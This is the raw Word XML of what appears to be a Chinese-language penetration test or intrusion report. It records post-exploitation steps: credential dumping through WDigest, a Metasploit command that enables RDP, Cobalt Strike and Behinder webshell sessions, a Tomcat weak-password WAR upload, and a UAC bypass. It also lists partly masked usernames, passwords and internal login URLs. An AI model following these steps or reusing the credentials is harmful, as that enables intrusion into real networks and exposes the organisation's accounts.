      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>2.qq.com/cgi-bin/xlogin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[USERNAME] -&gt; 2268256352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[PASSWORD] -&gt; d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***</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>20..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highlight w:val="green"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t xml:space="preserve">[URL] -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "http://1.1.1.4/ac_portal/default/pc.html" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="green"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>1.*.*.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>/ac</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>****</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>tal/de</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>****</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="23"/>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>lt/pc.html</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="green"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve"> （域账户登录web）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsiaTheme="minorEastAsia"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">[USERNAME] -&gt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>dxxxxsxxxbxxx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[PASSWORD] -&gt; d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***</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>20..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highlight w:val="green"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>[URL] -&gt; http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="green"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>127.*.*.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>:8080/web/lcam/gpip/login.ac</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsiaTheme="minorEastAsia"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>[USERNAME] -&gt; w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***</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>j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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>b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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>@</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>s*</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>c**.c**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[PASSWORD] -&gt; he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***</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>23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highlight w:val="green"/>
        </w:rPr>
        <w:t>[URL] -&gt; http://</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="green"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>127.*.*.1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>:8080/web/lcam/gpip/initLogin.ac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[USERNAME] -&gt; SuperAdmin</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>[PASSWORD] -&gt; Gp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>****</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>020</w:t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92" w:name="_Toc28514"/>
      <w:bookmarkStart w:id="393" w:name="_Toc20616"/>
      <w:bookmarkStart w:id="394" w:name="_Toc25832"/>
      <w:bookmarkStart w:id="395" w:name="_Toc24596"/>
      <w:bookmarkStart w:id="396" w:name="_Toc18616"/>
      <w:bookmarkStart w:id="397" w:name="_Toc25680"/>
      <w:bookmarkStart w:id="398" w:name="_Toc30272"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Window内存凭证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="392"/>
      <w:bookmarkEnd w:id="393"/>
      <w:bookmarkEnd w:id="394"/>
      <w:bookmarkEnd w:id="395"/>
      <w:bookmarkEnd w:id="396"/>
      <w:bookmarkEnd w:id="397"/>
      <w:bookmarkEnd w:id="398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845560" cy="2259330"/>
            <wp:effectExtent l="0" t="0" r="10160" b="11430"/>
            <wp:docPr id="134" name="图片 134" descr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99" w:name="_Toc14487"/>
      <w:bookmarkStart w:id="400" w:name="_Toc28268"/>
      <w:bookmarkStart w:id="401" w:name="_Toc11667"/>
      <w:bookmarkStart w:id="402" w:name="_Toc29840"/>
      <w:bookmarkStart w:id="403" w:name="_Toc19790"/>
      <w:bookmarkStart w:id="404" w:name="_Toc13070"/>
      <w:bookmarkStart w:id="405" w:name="_Toc18328"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>开启WDigest后:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="399"/>
      <w:bookmarkEnd w:id="400"/>
      <w:bookmarkEnd w:id="401"/>
      <w:bookmarkEnd w:id="402"/>
      <w:bookmarkEnd w:id="403"/>
      <w:bookmarkEnd w:id="404"/>
      <w:bookmarkEnd w:id="405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4403725" cy="3062605"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"/>
            <wp:docPr id="135" name="图片 135" descr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06" w:name="_Toc26319"/>
      <w:bookmarkStart w:id="407" w:name="_Toc4499"/>
      <w:bookmarkStart w:id="408" w:name="_Toc11751"/>
      <w:bookmarkStart w:id="409" w:name="_Toc25088"/>
      <w:bookmarkStart w:id="410" w:name="_Toc2314"/>
      <w:bookmarkStart w:id="411" w:name="_Toc28796"/>
      <w:bookmarkStart w:id="412" w:name="_Toc3190"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>查看保存凭证</w:t>
      </w:r>
      <w:bookmarkEnd w:id="406"/>
      <w:bookmarkEnd w:id="407"/>
      <w:bookmarkEnd w:id="408"/>
      <w:bookmarkEnd w:id="409"/>
      <w:bookmarkEnd w:id="410"/>
      <w:bookmarkEnd w:id="411"/>
      <w:bookmarkEnd w:id="412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4072890" cy="1957070"/>
            <wp:effectExtent l="0" t="0" r="11430" b="8890"/>
            <wp:docPr id="136" name="图片 136" descr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域账户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域密码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10.xx.xx.64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dxxxxsxxxbxxx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d***20..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10.xx.xx.50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hxxxxdxxxxmxxx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52N****++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13" w:name="_Toc22883"/>
      <w:bookmarkStart w:id="414" w:name="_Toc940"/>
      <w:bookmarkStart w:id="415" w:name="_Toc28177"/>
      <w:bookmarkStart w:id="416" w:name="_Toc32743"/>
      <w:bookmarkStart w:id="417" w:name="_Toc26413"/>
      <w:bookmarkStart w:id="418" w:name="_Toc16206"/>
      <w:bookmarkStart w:id="419" w:name="_Toc20416"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>远程桌面</w:t>
      </w:r>
      <w:bookmarkEnd w:id="413"/>
      <w:bookmarkEnd w:id="414"/>
      <w:bookmarkEnd w:id="415"/>
      <w:bookmarkEnd w:id="416"/>
      <w:bookmarkEnd w:id="417"/>
      <w:bookmarkEnd w:id="418"/>
      <w:bookmarkEnd w:id="419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420" w:name="_Toc26271"/>
      <w:bookmarkStart w:id="421" w:name="_Toc2915"/>
      <w:bookmarkStart w:id="422" w:name="_Toc24280"/>
      <w:bookmarkStart w:id="423" w:name="_Toc12226"/>
      <w:bookmarkStart w:id="424" w:name="_Toc12557"/>
      <w:bookmarkStart w:id="425" w:name="_Toc24435"/>
      <w:bookmarkStart w:id="426" w:name="_Toc24766"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>开启远程桌面</w:t>
      </w:r>
      <w:bookmarkEnd w:id="420"/>
      <w:bookmarkEnd w:id="421"/>
      <w:bookmarkEnd w:id="422"/>
      <w:bookmarkEnd w:id="423"/>
      <w:bookmarkEnd w:id="424"/>
      <w:bookmarkEnd w:id="425"/>
      <w:bookmarkEnd w:id="426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开启命令行：meterpreter &gt; run post/windows/manage/enable_rdp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50055" cy="960755"/>
            <wp:effectExtent l="0" t="0" r="1905" b="1460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/root/.msf4/loot/20221109063434_default_</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>10.*.*.162</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>_host.windows.cle_331594.txt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32275" cy="941070"/>
            <wp:effectExtent l="0" t="0" r="4445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427" w:name="_Toc10519"/>
      <w:bookmarkStart w:id="428" w:name="_Toc1602"/>
      <w:bookmarkStart w:id="429" w:name="_Toc18037"/>
      <w:bookmarkStart w:id="430" w:name="_Toc29657"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>成功连接</w:t>
      </w:r>
      <w:bookmarkEnd w:id="427"/>
      <w:bookmarkEnd w:id="428"/>
      <w:bookmarkEnd w:id="429"/>
      <w:bookmarkEnd w:id="43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14750" cy="2752725"/>
            <wp:effectExtent l="0" t="0" r="3810" b="571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31" w:name="_Toc21078"/>
      <w:bookmarkStart w:id="432" w:name="_Toc20202"/>
      <w:bookmarkStart w:id="433" w:name="_Toc17130"/>
      <w:bookmarkStart w:id="434" w:name="_Toc26947"/>
      <w:bookmarkStart w:id="435" w:name="_Toc5374"/>
      <w:bookmarkStart w:id="436" w:name="_Toc7406"/>
      <w:bookmarkStart w:id="437" w:name="_Toc6351"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>cs上线</w:t>
      </w:r>
      <w:bookmarkEnd w:id="431"/>
      <w:bookmarkEnd w:id="432"/>
      <w:bookmarkEnd w:id="433"/>
      <w:bookmarkEnd w:id="434"/>
      <w:bookmarkEnd w:id="435"/>
      <w:bookmarkEnd w:id="436"/>
      <w:bookmarkEnd w:id="43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08705" cy="1903730"/>
            <wp:effectExtent l="0" t="0" r="3175" b="127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38" w:name="_Toc27296"/>
      <w:bookmarkStart w:id="439" w:name="_Toc21574"/>
      <w:bookmarkStart w:id="440" w:name="_Toc12989"/>
      <w:bookmarkStart w:id="441" w:name="_Toc24718"/>
      <w:bookmarkStart w:id="442" w:name="_Toc1797"/>
      <w:bookmarkStart w:id="443" w:name="_Toc18914"/>
      <w:bookmarkStart w:id="444" w:name="_Toc19954"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>进程注入：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="438"/>
      <w:bookmarkEnd w:id="439"/>
      <w:bookmarkEnd w:id="440"/>
      <w:bookmarkEnd w:id="441"/>
      <w:bookmarkEnd w:id="442"/>
      <w:bookmarkEnd w:id="443"/>
      <w:bookmarkEnd w:id="44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10430" cy="2330450"/>
            <wp:effectExtent l="0" t="0" r="13970" b="127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45" w:name="_Toc6478"/>
      <w:bookmarkStart w:id="446" w:name="_Toc15426"/>
      <w:bookmarkStart w:id="447" w:name="_Toc16892"/>
      <w:bookmarkStart w:id="448" w:name="_Toc24565"/>
      <w:bookmarkStart w:id="449" w:name="_Toc12499"/>
      <w:bookmarkStart w:id="450" w:name="_Toc28575"/>
      <w:bookmarkStart w:id="451" w:name="_Toc14816"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>远程VNC</w:t>
      </w:r>
      <w:bookmarkEnd w:id="445"/>
      <w:bookmarkEnd w:id="446"/>
      <w:bookmarkEnd w:id="447"/>
      <w:bookmarkEnd w:id="448"/>
      <w:bookmarkEnd w:id="449"/>
      <w:bookmarkEnd w:id="450"/>
      <w:bookmarkEnd w:id="451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770630" cy="2011680"/>
            <wp:effectExtent l="0" t="0" r="8890" b="0"/>
            <wp:docPr id="137" name="图片 137" descr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52" w:name="_Toc31568"/>
      <w:bookmarkStart w:id="453" w:name="_Toc31475"/>
      <w:bookmarkStart w:id="454" w:name="_Toc8228"/>
      <w:bookmarkStart w:id="455" w:name="_Toc16356"/>
      <w:bookmarkStart w:id="456" w:name="_Toc19420"/>
      <w:bookmarkStart w:id="457" w:name="_Toc27150"/>
      <w:bookmarkStart w:id="458" w:name="_Toc26440"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通过Chrome浏览器收藏的书签url链接获取密码表</w:t>
      </w:r>
      <w:bookmarkEnd w:id="452"/>
      <w:bookmarkEnd w:id="453"/>
      <w:bookmarkEnd w:id="454"/>
      <w:bookmarkEnd w:id="455"/>
      <w:bookmarkEnd w:id="456"/>
      <w:bookmarkEnd w:id="457"/>
      <w:bookmarkEnd w:id="45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13580" cy="2211070"/>
            <wp:effectExtent l="0" t="0" r="12700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459" w:name="_Toc12697"/>
      <w:bookmarkStart w:id="460" w:name="_Toc23458"/>
      <w:bookmarkStart w:id="461" w:name="_Toc20974"/>
      <w:bookmarkStart w:id="462" w:name="_Toc11451"/>
      <w:bookmarkStart w:id="463" w:name="_Toc5016"/>
      <w:bookmarkStart w:id="464" w:name="_Toc20008"/>
      <w:bookmarkStart w:id="465" w:name="_Toc465"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>批量打开url链接：</w:t>
      </w:r>
      <w:bookmarkEnd w:id="459"/>
      <w:bookmarkEnd w:id="460"/>
      <w:bookmarkEnd w:id="461"/>
      <w:bookmarkEnd w:id="462"/>
      <w:bookmarkEnd w:id="463"/>
      <w:bookmarkEnd w:id="464"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>url.bat脚本</w:t>
      </w:r>
      <w:bookmarkEnd w:id="465"/>
    </w:p>
    <w:p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70500" cy="2321560"/>
            <wp:effectExtent l="0" t="0" r="2540" b="10160"/>
            <wp:docPr id="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bidi w:val="0"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="466" w:name="_Toc3254"/>
      <w:bookmarkStart w:id="467" w:name="_Toc11134"/>
      <w:bookmarkStart w:id="468" w:name="_Toc22536"/>
      <w:bookmarkStart w:id="469" w:name="_Toc833"/>
      <w:bookmarkStart w:id="470" w:name="_Toc26392"/>
      <w:bookmarkStart w:id="471" w:name="_Toc6294"/>
      <w:bookmarkStart w:id="472" w:name="_Toc32332"/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:8089 </w:t>
      </w:r>
      <w:bookmarkEnd w:id="466"/>
      <w:bookmarkEnd w:id="467"/>
      <w:bookmarkEnd w:id="468"/>
      <w:bookmarkEnd w:id="469"/>
      <w:bookmarkEnd w:id="470"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>mxxhxxbxx</w:t>
      </w:r>
      <w:bookmarkEnd w:id="471"/>
      <w:bookmarkEnd w:id="472"/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73" w:name="_Toc14486"/>
      <w:bookmarkStart w:id="474" w:name="_Toc17744"/>
      <w:bookmarkStart w:id="475" w:name="_Toc5880"/>
      <w:bookmarkStart w:id="476" w:name="_Toc18307"/>
      <w:bookmarkStart w:id="477" w:name="_Toc31306"/>
      <w:bookmarkStart w:id="478" w:name="_Toc6985"/>
      <w:bookmarkStart w:id="479" w:name="_Toc3413"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>漏洞入口:Tomcat弱口令+上传war包</w:t>
      </w:r>
      <w:bookmarkEnd w:id="473"/>
      <w:bookmarkEnd w:id="474"/>
      <w:bookmarkEnd w:id="475"/>
      <w:bookmarkEnd w:id="476"/>
      <w:bookmarkEnd w:id="477"/>
      <w:bookmarkEnd w:id="478"/>
      <w:bookmarkEnd w:id="479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480" w:name="_Toc23866"/>
      <w:bookmarkStart w:id="481" w:name="_Toc24472"/>
      <w:bookmarkStart w:id="482" w:name="_Toc15819"/>
      <w:bookmarkStart w:id="483" w:name="_Toc5824"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>fscan扫描结果</w:t>
      </w:r>
      <w:bookmarkEnd w:id="480"/>
      <w:bookmarkEnd w:id="481"/>
      <w:bookmarkEnd w:id="482"/>
      <w:bookmarkEnd w:id="483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70425" cy="275590"/>
            <wp:effectExtent l="0" t="0" r="8255" b="1397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484" w:name="_Toc23764"/>
      <w:bookmarkStart w:id="485" w:name="_Toc19094"/>
      <w:bookmarkStart w:id="486" w:name="_Toc2450"/>
      <w:bookmarkStart w:id="487" w:name="_Toc27938"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>通过弱口令成功上传war包</w:t>
      </w:r>
      <w:bookmarkEnd w:id="484"/>
      <w:bookmarkEnd w:id="485"/>
      <w:bookmarkEnd w:id="486"/>
      <w:bookmarkEnd w:id="48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73780" cy="1403985"/>
            <wp:effectExtent l="0" t="0" r="7620" b="1333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弱口令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用户名：tomcat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密码：tomcat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88" w:name="_Toc6063"/>
      <w:bookmarkStart w:id="489" w:name="_Toc24983"/>
      <w:bookmarkStart w:id="490" w:name="_Toc31721"/>
      <w:bookmarkStart w:id="491" w:name="_Toc23713"/>
      <w:bookmarkStart w:id="492" w:name="_Toc10503"/>
      <w:bookmarkStart w:id="493" w:name="_Toc28757"/>
      <w:bookmarkStart w:id="494" w:name="_Toc5905"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Behinder 上线</w:t>
      </w:r>
      <w:bookmarkEnd w:id="488"/>
      <w:bookmarkEnd w:id="489"/>
      <w:bookmarkEnd w:id="490"/>
      <w:bookmarkEnd w:id="491"/>
      <w:bookmarkEnd w:id="492"/>
      <w:bookmarkEnd w:id="493"/>
      <w:bookmarkEnd w:id="49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22065" cy="3199130"/>
            <wp:effectExtent l="0" t="0" r="3175" b="127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495" w:name="_Toc17484"/>
      <w:bookmarkStart w:id="496" w:name="_Toc3166"/>
      <w:bookmarkStart w:id="497" w:name="_Toc4976"/>
      <w:bookmarkStart w:id="498" w:name="_Toc20275"/>
      <w:bookmarkStart w:id="499" w:name="_Toc6278"/>
      <w:bookmarkStart w:id="500" w:name="_Toc12556"/>
      <w:bookmarkStart w:id="501" w:name="_Toc7090"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>UAC提权,多试试注入svchost.exe进程的会话</w:t>
      </w:r>
      <w:bookmarkEnd w:id="495"/>
      <w:bookmarkEnd w:id="496"/>
      <w:bookmarkEnd w:id="497"/>
      <w:bookmarkEnd w:id="498"/>
      <w:bookmarkEnd w:id="499"/>
      <w:bookmarkEnd w:id="500"/>
      <w:bookmarkEnd w:id="501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7855" cy="2005965"/>
            <wp:effectExtent l="0" t="0" r="6985" b="571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RC4密码: IvMiMUWT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02" w:name="_Toc4458"/>
      <w:bookmarkStart w:id="503" w:name="_Toc15202"/>
      <w:bookmarkStart w:id="504" w:name="_Toc21007"/>
      <w:bookmarkStart w:id="505" w:name="_Toc27548"/>
      <w:bookmarkStart w:id="506" w:name="_Toc8842"/>
      <w:bookmarkStart w:id="507" w:name="_Toc29766"/>
      <w:bookmarkStart w:id="508" w:name="_Toc1721"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
